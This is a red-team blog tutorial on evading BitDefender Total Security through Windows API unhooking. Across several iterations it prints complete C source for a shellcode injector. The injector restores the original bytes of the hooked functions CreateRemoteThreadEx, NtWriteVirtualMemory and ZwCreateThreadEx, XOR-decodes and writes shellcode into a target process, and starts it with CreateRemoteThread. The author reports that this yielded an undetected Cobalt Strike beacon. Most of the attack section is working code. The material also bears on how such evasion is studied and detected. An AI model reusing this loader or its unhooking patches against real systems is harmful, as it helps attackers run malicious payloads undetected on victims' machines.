Estimated Reading Time: 14 minutes
Bypassing endpoint protections such as AVs/EDRs is a phase that you need to take care of when you prepare for your red team operation, it could take some time to understand how these solutions are working before you try to bypass them.
And with the large number of resources published online on this topic, it became easy to understand how these things work and how you can bypass them.
In this article, I will show you how I managed to bypass BitDefender total security using windows API unhooking, we will take about the concept of API unhooking then we will take about how we can bypass the protection using this technique.
Our main objective will perform process injection to get an active cobalt strike beacon while BitDefender total security is enabled on the endpoint.
API hooking is a method used to intercept and inspect the win32 API calls, this technique used by AVs/EDRs in order to monitor the win32 API calls and determine if these calls are legitimate or not.
So basically, they will change the execution flow of the normal API call by adding a JMP instruction to a custom module controlled by the solution itself that will scan the API call and its arguments and check if they are legitimate or not.
This article by spotless explains how the API hooking works, you can check it for more details about it.
In a previous article, I talked about how we can encode the shellcode and decode it in the memory to avoid the detection, Let’s try this technique and check if it will work with BitDefender total security.
I used the following code after generating the encoded shellcode as we did in the previous article, and the code will be like this:
#include <windows.h> // This code was written for researching purpose, you have to edit it before using it in real-world // This code will deocde your shellcode and write it directly to the memory int main(int argc, char* argv[]) { // Our Shellcode unsigned char shellcode[] = "MyEncodedshellcode"; // Check arguments counter if(argc != 2){ printf("[+] Usage : decoder.exe [PID]\n"); exit(0); } // The process id we want to inject our code to passed to the executable // Use GetCurrentProcessId() to inject the shellcode into original process int process_id = atoi(argv[1]); // Define the base_address variable which will save the allocated memory address LPVOID base_address; // Retrive the process handle using OpenProcess HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id); if (process) { printf("[+] Handle retrieved successfully!\n"); printf("[+] Handle value is %p\n", process); base_address = VirtualAllocEx(process, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (base_address) { printf("[+] Allocated based address is 0x%x\n", base_address); // Data chars counter int i; // Base address counter int n = 0; for(i = 0; i<=sizeof(shellcode); i++){ // Decode shellcode opcode (you can edit it based on your encoder settings) char DecodedOpCode = shellcode[i] ^ 0x01; // Write the decoded bytes in memory address if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){ // Write the memory address where the data was written printf("[+] Byte 0x%X wrote sucessfully! at 0x%X\n", DecodedOpCode, base_address + n); // Increase memory address by 1 n++; } } // Run our code as RemoteThread CreateRemoteThread(process, NULL, 100,(LPTHREAD_START_ROUTINE)base_address, NULL, NULL, 0x50002); } else { printf("[+] Unable to allocate memory ..\n"); } } else { printf("[-] Enable to retrieve process handle\n"); } }
After I compiled the file and executed it to inject the shellcode on explorer.exe, I got the following:
As we can see, BitDefender detected the execution and blocked the action, my file “injector.exe” was deleted too.
So, what is actually happening, and why the action got blocked?
I start debugging my executable after recompiling it to see if there is any external DLLs are injected to the executable to get the following:
A file called “atcuf64.dll” was loaded to my executable and it’s related to BitDefender!
So, I started to debug the main win32APIs that I called during the shellcode injection, and of course, I started with the most suspicious one which is “CreateRemoteThread” to get the following after disassembling it:
Nothing suspicious here, but as we can see from the execution flow that we will hit CreateRemoteThreadEx API, so, I disassemble it to get the following:
That looks unusual! we have a JMP instruction at the beginning of the API, and if we took the JMP and continue with the execution flow, we will get the following:
As we can see, after executing the JMP and continue with the execution flow, we landed at actuf64.dll which means there is a hook on this function that redirects the execution flow to BitDefender’s module to inspect the call.
So, when we try to make a call for CreateRemoteThread when it reaches CreateRemoteThreadEx, the call will be redirected to BitDefender’s module, and to bypass it from being inspected, we need to return the function CreateRemoteThreadEx to its original status, and that is the unhooking concept.
And based on that, our CreateRemoteThread API call will not continue with the intended execution flow, which means that it will not reach “ZwCreateThreadEx” API which is the underlying API that CreateRemoteThreadEx depend on it.
We will take about this later on, but just keep this on the mind.
Again, API Unhooking is a technique used to return the API to its original status after it being manipulated by the AV/EDR, and by manipulated here we refer to the JMP that has been added to the API to hook it and change the original execution flow.
How we can return it to its original status? We can do the following to achieve that:
To get the main CreateRemoteThreadEx API original bytes, we can open a new window of our debugger “x64dbg” in our case and load kernelbase.dll because our CreateRemoteThreadEx function existed there.
And then we can type “disasm CreateRemoteThreadEx” in the command windows to get the following:
Another way to get the original bytes from “x64dbg” will be to go to the symbols tab after attaching the debugger to kernelbase.dll, and finally, in the search bar, we can search for the CreateRemoteThreadEx function and double click on it to get the following:
As we can see, we were able to get the original bytes by disassembling the API, and what we can see from the original bytes that there are 5 bytes “4C 8B DC 53 56” that were replaced with the JMP instruction, so in order to unhook the function and restore it to it’s original status, we need to rewrite those bytes in kernelbase.dll after being loaded to our binary.
We can use the following code to do that:
// Patch 1 to unhook CreateRemoteThreadEx (kernelbase.dll) HANDLE kernalbase_handle = GetModuleHandle("kernelbase"); LPVOID CRT_address = GetProcAddress(kernalbase_handle, "CreateRemoteThreadEx"); printf("[+] CreateRemoteThreadEx address is : %p\n", CRT_address); if (WriteProcessMemory(GetCurrentProcess(), CRT_address, "\x4C\x8B\xDC\x53\x56", 5 , NULL)){ printf("[+] CreateRemoteThreadEx unhooking done!\n"); }
This code will use GetModuleHandle function to retrieve a handle for the module kernelbase.dll, then, we use GetProcAddress to get the address of the function CreateRemoteThreadEx.
After that, we will print the address of CreateRemoteThreadEx, and finally, we will write the bytes “\x4C\x8B\xDC\x53\x56” which are the original bytes to the beginning of the function to restore it to its original status using WriteProcessMemory.
And of course, we passed CetCurrentProcess() to WriteProcessMemory as a handle for our process.
So, our code will be:
#include <windows.h> // This code was written for researching purpose, you have to edit it before using it in real-world // This code will deocde your shellcode and write it directly to the memory using WIN32APIs // This code will unhook a couple of WIN32 APIs that was hooked by Bit defender total security int main(int argc, char* argv[]) { // Our Shellcode unsigned char shellcode[] = ""; // Check arguments counter if(argc != 2){ printf("[+] Usage : injector.exe [PID]\n"); exit(0); } // The process id we want to inject our code to passed to the executable // Use GetCurrentProcessId() to inject the shellcode into original process int process_id = atoi(argv[1]); // Patch 1 to unhook CreateRemoteThreadEx (kernelbase.dll) HANDLE kernalbase_handle = GetModuleHandle("kernelbase"); LPVOID CRT_address = GetProcAddress(kernalbase_handle, "CreateRemoteThreadEx"); printf("[+] CreateRemoteThreadEx address is : %p\n", CRT_address); if (WriteProcessMemory(GetCurrentProcess(), CRT_address, "\x4C\x8B\xDC\x53\x56", 5 , NULL)){ printf("[+] CreateRemoteThreadEx unhooking done!\n"); } // Define the base_address variable which will save the allocated memory address LPVOID base_address; // Retrive the process handle using OpenProcess HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id); if (process) { printf("[+] Handle retrieved successfully!\n"); printf("[+] Handle value is %p\n", process); base_address = VirtualAllocEx(process, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (base_address) { printf("[+] Allocated based address is 0x%x\n", base_address); // Data chars counter int i; // Base address counter int n = 0; for(i = 0; i<=sizeof(shellcode); i++){ // Decode shellcode opcode (you can edit it based on your encoder settings) char DecodedOpCode = shellcode[i] ^ 0x01; // Write the decoded bytes in memory address if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){ // Write the memory address where the data was written printf("[+] Byte 0x%X wrote sucessfully! at 0x%X\n", DecodedOpCode, base_address + n); // Increase memory address by 1 n++; } } // Run our code as RemoteThread CreateRemoteThread(process, NULL, 100,(LPTHREAD_START_ROUTINE)base_address, NULL, 0, 0x1337); } else { printf("[+] Unable to allocate memory ..\n"); } } else { printf("[-] Enable to retrieve process h2andle\n"); } }
After recompiling it, I attached it to the debugger again and put a breakpoint in the OpenPrcoess function to make sure that we reached the patching part “unhooking part” like the following:
As we can see, the patching process is done without any problems, and we printed the CreateRemoteThreadEx function address, which is the same as we as before.
So, let’s disassemble that address “which is CreateRemoteThreadEx” address, to get the following:
Excellent! we can see that we restored the original bytes for our API “unhooked it” and the execution flow will return to normal.
Now if we run the software we should be fine, right?
Unfortunately, no! because when I executed the program, it got detected again, but this type before it even reaches the CreateRemoteThread function, which means that there is another API that got caught after we edited the code.
After some digging in the code, and after reviewing the modifications that I did, I noticed that we used “WriteProcessMemory” call to write each byte from our shellcode, and also to patch the memory, which makes this suspicious for BitDefender.
So I tried to see if WriteProcessMemory is hooked by disassembling it to get the following:
Nothing suspicious with it, let’s follow the execution flow and see what it does actually after hitting this normal JMP to kernelbase:
So as we can see, we reached a point that a call to “NtWriteVirtualMemory” occurs, which is, of course, the underlying function that is used by “WriteProcessMemory”, let’s follow the call to see how it looks like:
The function “NtWriteVirtualMemory” is hooked! and for some reason, once we patched the memory and used it to write the shellcode it got detected, please note that when I executed the executable for the first time, it reached the CreateRemoteThread successfully!
Which means that the call became suspicious once we added the patch function.
So to bypass that, we need to patch the “NtWriteVirtualMemory”, let’s get the original bytes of it as we did with “CreateRemoteThreadEx” function.
And to do that, we will open ntdll.dll in our debug and disassemble “NtWriteVirtualMemory” to get the following bytes:
As we can see, we got the original bytes for “NtWriteVirualMemory” which was replaced with JMP to the Bitdefender module.
The JMP replaced these bytes “4C 8B D1 B8 3C”, so to unhook the function, we need to replace the JMP with these 5 bytes, and to do that we will reuse the previous code to be like the following:
// Patch 2 to unhook NtWriteVirtualMemory (ntdll.dll) // Unhooked it because it gets detected while calling it multiple times HANDLE ntdll_handle = GetModuleHandle("ntdll"); LPVOID NtWriteVirtualMemory_Address = GetProcAddress(ntdll_handle, "NtWriteVirtualMemory"); printf("[+] NtWriteVirtualMemory address is : %p\n", NtWriteVirtualMemory_Address); if (WriteProcessMemory(GetCurrentProcess(), NtWriteVirtualMemory_Address, "\x4C\x8B\xD1\xB8\x3A", 5 , NULL)){ printf("[+] NtWriteVirtualMemory unkooking done!\n"); }
We just reused GetModuleHandle to get “ntdll” library and used GetProcAddress to get the address of “NtWriteVirtualMemory”.
And finally, we wrote the original bytes to the beginning of the “NtWriteVirtualMemory” which will replace the JMP with these 5 bytes.
So the injector code will be:
#include <windows.h> // This code was written for researching purpose, you have to edit it before using it in real-world // This code will deocde your shellcode and write it directly to the memory using WIN32APIs // This code will unhook a couple of WIN32 APIs that was hooked by Bit defender total security int main(int argc, char* argv[]) { // Our Shellcode unsigned char shellcode[] = ""; // Check arguments counter if(argc != 2){ printf("[+] Usage : injector.exe [PID]\n"); exit(0); } // The process id we want to inject our code to passed to the executable // Use GetCurrentProcessId() to inject the shellcode into original process int process_id = atoi(argv[1]); // Patch 1 to unhook CreateRemoteThreadEx (kernelbase.dll) HANDLE kernalbase_handle = GetModuleHandle("kernelbase"); LPVOID CRT_address = GetProcAddress(kernalbase_handle, "CreateRemoteThreadEx"); printf("[+] CreateRemoteThreadEx address is : %p\n", CRT_address); if (WriteProcessMemory(GetCurrentProcess(), CRT_address, "\x4C\x8B\xDC\x53\x56", 5 , NULL)){ printf("[+] CreateRemoteThreadEx unhooking done!\n"); } // Patch 2 to unhook NtWriteVirtualMemory (ntdll.dll) // Unhooked it because it gets detected while calling it multiple times HANDLE ntdll_handle = GetModuleHandle("ntdll"); LPVOID NtWriteVirtualMemory_Address = GetProcAddress(ntdll_handle, "NtWriteVirtualMemory"); printf("[+] NtWriteVirtualMemory address is : %p\n", NtWriteVirtualMemory_Address); if (WriteProcessMemory(GetCurrentProcess(), NtWriteVirtualMemory_Address, "\x4C\x8B\xD1\xB8\x3A", 5 , NULL)){ printf("[+] NtWriteVirtualMemory unkooking done!\n"); } // Define the base_address variable which will save the allocated memory address LPVOID base_address; // Retrive the process handle using OpenProcess HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id); if (process) { printf("[+] Handle retrieved successfully!\n"); printf("[+] Handle value is %p\n", process); base_address = VirtualAllocEx(process, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (base_address) { printf("[+] Allocated based address is 0x%x\n", base_address); // Data chars counter int i; // Base address counter int n = 0; for(i = 0; i<=sizeof(shellcode); i++){ // Decode shellcode opcode (you can edit it based on your encoder settings) char DecodedOpCode = shellcode[i] ^ 0x01; // Write the decoded bytes in memory address if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){ // Write the memory address where the data was written printf("[+] Byte 0x%X wrote sucessfully! at 0x%X\n", DecodedOpCode, base_address + n); // Increase memory address by 1 n++; } } // Run our code as RemoteThread CreateRemoteThread(process, NULL, 100,(LPTHREAD_START_ROUTINE)base_address, NULL, 0, 0x1337); } else { printf("[+] Unable to allocate memory ..\n"); } } else { printf("[-] Enable to retrieve process h2andle\n"); } }
let’s compile it and attach it to our debugger, and lets put a breakpoint into CreateRemoteThread This time to see if we will reach it or not, also, we will check the console if we patched the two functions or not.
If we reached CreateRemoteThread, that means we patched the “NtWriteVirtualMemory” function and was able to bypass the restriction on it.
So, after doing that, I got the following results:
Excellent! we can see that we reached CreateRemoteThread after unhooking the two functions, which means we are ready to continue the execution.
But stop here and remember my words about “ZwCreateThreadEx” which is the underlying function for the CreateRemoteThreadEx, so let us continue the execution flow until we reach it to check if its hooked or now.
As we can see, the function ZwCreateThreadEx is hooked too! which means if we continue the execution flow it will be redirected again to BitDefender’s modules which is something we need to avoid.
So for the last time, let’s unhook this function by getting the original bytes of it and then rewrite them to the hooked instructions.
I will open “ntdll.dll” and read the original instruction from “ZwCreateThreadEx” like the following:
And when we click on the function, we will get the following:
We got the original bytes for ZwCreateThreadEx which are “4C 8B D1 B8 C1”, so again, to unhook the function now we just need to rewrite these bytes to the original function in ntdll after being loaded to our executable.
Please note that all the original bytes related to the syscall itself, which means the JMP instruction each time prevents the API to be executed without being intercepted.
We will use this code to write the final patch which will unhook the ZwCreateThreadEx function like the following:
#include <windows.h> // This code was written for researching purpose, you have to edit it before using it in real-world // This code will deocde your shellcode and write it directly to the memory using WIN32APIs // This code will unhook a couple of WIN32 APIs that was hooked by Bit defender total security int main(int argc, char* argv[]) { // Our Shellcode unsigned char shellcode[] = ""; // Check arguments counter if(argc != 2){ printf("[+] Usage : injector.exe [PID]\n"); exit(0); } // The process id we want to inject our code to passed to the executable // Use GetCurrentProcessId() to inject the shellcode into original process int process_id = atoi(argv[1]); // Patch 1 to unhook CreateRemoteThreadEx (kernelbase.dll) HANDLE kernalbase_handle = GetModuleHandle("kernelbase"); LPVOID CRT_address = GetProcAddress(kernalbase_handle, "CreateRemoteThreadEx"); printf("[+] CreateRemoteThreadEx address is : %p\n", CRT_address); if (WriteProcessMemory(GetCurrentProcess(), CRT_address, "\x4C\x8B\xDC\x53\x56", 5 , NULL)){ printf("[+] CreateRemoteThreadEx unhooking done!\n"); } // Patch 2 to unhook NtWriteVirtualMemory (ntdll.dll) // Unhooked it because it gets detected while calling it multiple times HANDLE ntdll_handle = GetModuleHandle("ntdll"); LPVOID NtWriteVirtualMemory_Address = GetProcAddress(ntdll_handle, "NtWriteVirtualMemory"); printf("[+] NtWriteVirtualMemory address is : %p\n", NtWriteVirtualMemory_Address); if (WriteProcessMemory(GetCurrentProcess(), NtWriteVirtualMemory_Address, "\x4C\x8B\xD1\xB8\x3A", 5 , NULL)){ printf("[+] NtWriteVirtualMemory unkooking done!\n"); } // Patch 3 to unhook ZwCreateThreadEx (ntdll.dll) LPVOID ZWCreateThreadEx_address = GetProcAddress(ntdll_handle, "ZwCreateThreadEx"); printf("[+] ZwCreateThreadEx address is : %p\n", ZWCreateThreadEx_address); if (WriteProcessMemory(GetCurrentProcess(), ZWCreateThreadEx_address, "\x4C\x8B\xD1\xB8\xC1", 5 , NULL)){ printf("[+] ZwCreateThreadEx unhooking done!\n"); } // Define the base_address variable which will save the allocated memory address LPVOID base_address; // Retrive the process handle using OpenProcess HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id); if (process) { printf("[+] Handle retrieved successfully!\n"); printf("[+] Handle value is %p\n", process); base_address = VirtualAllocEx(process, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (base_address) { printf("[+] Allocated based address is 0x%x\n", base_address); // Data chars counter int i; // Base address counter int n = 0; for(i = 0; i<=sizeof(shellcode); i++){ // Decode shellcode opcode (you can edit it based on your encoder settings) char DecodedOpCode = shellcode[i] ^ 0x01; // Write the decoded bytes in memory address if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){ // Write the memory address where the data was written printf("[+] Byte 0x%X wrote sucessfully! at 0x%X\n", DecodedOpCode, base_address + n); // Increase memory address by 1 n++; } } // Run our code as RemoteThread CreateRemoteThread(process, NULL, 100,(LPTHREAD_START_ROUTINE)base_address, NULL, 0, 0x1337); } else { printf("[+] Unable to allocate memory ..\n"); } } else { printf("[-] Enable to retrieve process h2andle\n"); } }
As we can see, we used the same code from patch2 but we just changed the bytes and the function name.
So, let us compile the code again and put a breakpoint into “CreateRemoteThread” to read the console and stop there, and then we will disassemble ZwCreateThreadEx to check if it was unhooked like the following:
As we can see, all functions have been unhooked successfully and we reached “CreateRemoteThread”, so let’s disassemble ZwCreateThreadEx to check to get the following:
As we can see, the function was unhooked successfully, and we should be able to execute the injector without any problems.
I will close the debugger now and execute it like the following:
As we can see, it got executed without problems, and no alerts were popped!
And that we got on Cobalt Strike after we got it executed:
We go an active cobalt strike beacon from the target without getting detected!
And this video shows a quick demo:
I want to thank spotless for his great articles about API hooking and his articles in general.
I used almost the same methodology he did in this article to achieve this.